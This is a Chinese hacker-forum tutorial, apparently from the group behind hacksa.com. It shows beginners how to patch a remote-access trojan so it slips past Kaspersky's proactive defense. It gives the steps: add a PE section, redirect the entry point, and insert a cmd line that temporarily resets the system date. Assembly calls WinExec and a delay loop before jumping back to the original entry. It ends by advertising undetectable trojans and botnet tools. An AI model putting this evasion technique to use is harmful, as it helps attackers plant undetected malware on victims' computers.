给木马添加过卡巴主动防御的代码

大家好，我是Misswe ，来自领域小组(www.hacksa.com)

今天给广大初学者做这样一个教程——给木马添加过卡巴主动防御的代码

这样大家可以做成，生成就过主动防御的鸽子了

本十分不愿意做这个教程

因为之前

incase 的教程里，讲过这个思路

king 在暗组里又重新做过一次，

不是很完美的过主动方法，不过，还不错拉

今天我来画蛇添足一次

被一些才才朋友逼急了，郁闷！^^ 大家加油，一起起飞，呵呵

用到的工具有——
1、zeroadd
2、loadpe
3、od

好，我们正式开始我们的教程吧

我们就拿vip2006 破解版的来做试验吧

好，看好操作

我做慢点

测试上线

1、添加区段

2、loadpe 打开

记下原来入口点

0000CA58    +     13140000   =  1314CA58

察看新添加的区段

记下虚拟地址

000BF000

修改入口点

我习惯 再加 20 ，呵呵

3、od载入

关键时刻

仔细看好操作

我尽量傻瓜说明

要改的日期

你可以改成自己的生日哦

哈哈，你的肉鸡就跟你一天诞生了

哈哈

cmd /c set date=%date% &&date 1986-11-22 &&ping 127.0.0.1&&ping 127.0.0.1&&ping 127.0.0.1&&ping 127.0.0.1&&date %date%

能看明白吧

复制一大段区域，，右键， 二进制，编辑， ASC 码， 粘贴

呵呵

好，继续添加

 
push 代码开始位置处      131FF060   

            
 
CALL WinExec    调用 WinExec 

NOP

NOP

MOV EAX,60000000         

CMP EAX,1

JE 原入口点                注意这个入口点是指od中的入口点
 
SUB EAX,1

JMP （cmp eax,1 这个位置）

来测试下

晕，我先恢复

汗死，刚才出错了，我重新做没改过来

小问题，也会造成大错误

呵呵

我没装主动防御，大家看操作吧

原理很简单，就是修改系统时间过卡巴主动防御

比捆绑能简单些

但是没有捆绑效果好

好了，教程到这里，还没结束，吼吼

广告吧，，

欢迎大家到领域小组交流学习， www.hacksa.com

持续免杀黑防鸽子，上兴， 已经推出

稍候推出  傀儡僵尸持续免杀

谢谢大家

再见